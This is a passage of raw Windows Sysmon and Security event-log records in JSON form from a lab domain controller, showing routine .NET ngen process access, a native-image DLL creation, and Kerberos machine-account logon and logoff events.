08:07:34.803","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22C6-5F25-0000-0010CB811100}","TargetProcessId":"5048","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:34.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22C6-5F25-0000-0010CB811100}\r\nTargetProcessId: 5048\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:34.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22C6-5F25-0000-0010CB811100}","TargetProcessId":"5048","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220719,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x1185F4\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x1185f4","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:07:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220720,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x1185F4\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50283\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x1185f4","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50283","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:07:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220721,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x1185F4\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x1185f4","LogonType":"3","EventReceivedTime":"2020-08-01 08:07:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:38.272\r\nProcessGuid: {41C8662E-22C6-5F25-0000-0010CB811100}\r\nProcessId: 5048\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\13b8-0\\System.Xml.dll\r\nCreationUtcTime: 2020-08-01 08:07:38.272","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:38.272","ProcessGuid":"{41C8662E-22C6-5F25-0000-0010CB811100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\13b8-0\\System.Xml.dll","CreationUtcTime":"2020-08-01 08:07:38.272","EventReceivedTime":"2020-08-01 08:07:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:38.396\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010A7F71000}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:38.396","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"2008","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010A7F71000}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 08:07:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:38.396\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010A7F71000}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:38.396","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010A7F71000}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:38.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22CA-5F25-0000-0010E3861100}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:38.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22CA-5F25-0000-0010E3861100}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:38.584\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4808\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22CA-5F25-0000-0010638A1100}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:38.584","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"4808","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22CA-5F25-0000-0010638A1100}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 08:07:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
